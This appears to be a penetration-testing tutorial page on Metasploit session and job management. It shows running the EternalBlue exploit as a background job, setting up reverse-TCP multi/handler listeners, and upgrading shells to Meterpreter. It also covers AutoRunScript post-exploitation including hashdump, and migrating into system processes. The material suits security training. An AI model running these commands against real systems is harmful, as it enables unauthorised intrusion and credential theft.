🔄 Sessions & Jobs¶

When an exploit succeeds, Metasploit creates a session — an active connection to the compromised target. Jobs are tasks running in the background (e.g., listeners, scanners). Mastering session and job management is essential for handling multiple targets simultaneously during an engagement.

1️⃣ Sessions¶

A session represents an active connection to a compromised host. It can be a basic command shell, a Meterpreter session, or even a VNC session.

Listing Sessions¶

msf6 > sessions

Active sessions
===============

  Id  Name  Type                     Information              Connection
  --  ----  ----                     -----------              ----------
  1         meterpreter x64/windows  DESKTOP-ABC\admin @ ...  10.10.14.2:4444 -> 10.10.10.5:49721
  2         shell x64/linux                                   10.10.14.2:4445 -> 10.10.10.6:35082

# List with verbose information
msf6 > sessions -v

Interacting with a Session¶

# Connect to a session by ID
msf6 > sessions -i 1

# You're now inside the session (e.g., Meterpreter prompt)
meterpreter > sysinfo

Backgrounding a Session¶

# From inside a Meterpreter session, press Ctrl+Z or type:
meterpreter > background

# Or from a shell session:
# Press Ctrl+Z

# Confirm you're back at the MSFconsole prompt
msf6 >

Tip

Always background sessions instead of closing them. A backgrounded session stays alive and can be resumed at any time with sessions -i <id>. Closing a session terminates the connection permanently.

Naming Sessions¶

# Give a session a descriptive name for easier management
msf6 > sessions -n "DC01_Admin" -i 1

# Now it shows up with the name in the session list
msf6 > sessions

Upgrading a Shell to Meterpreter¶

If you have a basic command shell and want the full power of Meterpreter:

# Upgrade session 2 (a basic shell) to Meterpreter
msf6 > sessions -u 2

Or from within the shell session:

msf6 > use post/multi/manage/shell_to_meterpreter
msf6 > set SESSION 2
msf6 > run

Killing Sessions¶

# Kill a specific session
msf6 > sessions -k 1

# Kill all sessions
msf6 > sessions -K

2️⃣ Running Commands Across Multiple Sessions¶

# Run a command on a specific session
msf6 > sessions -C "sysinfo" -i 1

# Run a command on ALL sessions
msf6 > sessions -C "sysinfo"

This is incredibly powerful for mass enumeration across many compromised hosts.

3️⃣ Jobs¶

A job is a task running in the background within MSFconsole. Common jobs include: - Payload handlers (listeners waiting for incoming connections). - Auxiliary scanners running against a subnet. - Exploits running with the -j flag.

Running an Exploit as a Job¶

# Run the exploit in the background
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j

[*] Exploit running as background job 1.
[*] Started reverse TCP handler on 10.10.14.2:4444

Listing Jobs¶

msf6 > jobs

Jobs
====

  Id  Name                              Payload                          Payload opts
  --  ----                              -------                          ------------
  1   Exploit: windows/smb/ms17_010_... windows/x64/meterpreter/rev...  tcp://10.10.14.2:4444

# List with verbose info
msf6 > jobs -v

Killing Jobs¶

# Kill a specific job
msf6 > jobs -k 1

# Kill all jobs
msf6 > jobs -K

Concept

Exploit jobs vs. sessions: When you run an exploit as a job (exploit -j), the exploit runs in the background and you get your MSFconsole prompt back immediately. When it succeeds, a new session is created automatically. You can then interact with the session using sessions -i <id>.

4️⃣ The Multi/Handler (Catch-All Listener)¶

The exploit/multi/handler is one of the most important "jobs" you'll run. It acts as a generic listener that catches incoming connections from payloads delivered through any means.

Setting Up a Handler¶

msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 10.10.14.2
msf6 > set LPORT 4444

# Run it as a background job
msf6 > exploit -j

[*] Started reverse TCP handler on 10.10.14.2:4444
[*] Exploit running as background job 0.

Running Multiple Handlers¶

You can run multiple handlers on different ports for different payloads:

# Handler 1: Meterpreter on port 4444
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 10.10.14.2
msf6 > set LPORT 4444
msf6 > exploit -j

# Handler 2: Shell on port 4445
msf6 > use exploit/multi/handler
msf6 > set PAYLOAD windows/shell/reverse_tcp
msf6 > set LHOST 10.10.14.2
msf6 > set LPORT 4445
msf6 > exploit -j

Tip

When using MSFVenom to generate a standalone payload, always set up a corresponding multi/handler with the exact same payload, LHOST, and LPORT before executing the payload on the target.

5️⃣ AutoRunScript¶

You can automatically run post-exploitation commands whenever a new session is created:

# Auto-migrate to a stable process after getting a Meterpreter session
msf6 > set AutoRunScript post/windows/manage/migrate

# Auto-run a custom resource script
msf6 > set AutoRunScript multi_console_command -cl "sysinfo,getuid,hashdump"

6️⃣ Gotchas¶

Note

Session stability: Shell sessions (especially Windows cmd.exe shells) can be fragile. If the exploited process crashes or is closed by a user, the session dies. Always migrate to a stable process (like explorer.exe or svchost.exe) as soon as possible after getting Meterpreter.

Note

Port conflicts: If you try to start a handler on a port that's already in use (by another handler or system service), it will fail silently or throw an error. Check jobs and netstat before starting handlers.

Note

Session timeouts: By default, sessions have a communication timeout. If the target goes offline temporarily, the session may die. Increase SessionCommunicationTimeout in advanced options for unstable connections.

Warning

Active sessions represent live connections to compromised systems. Handle them carefully — accidental commands can cause data loss or service disruption on the target.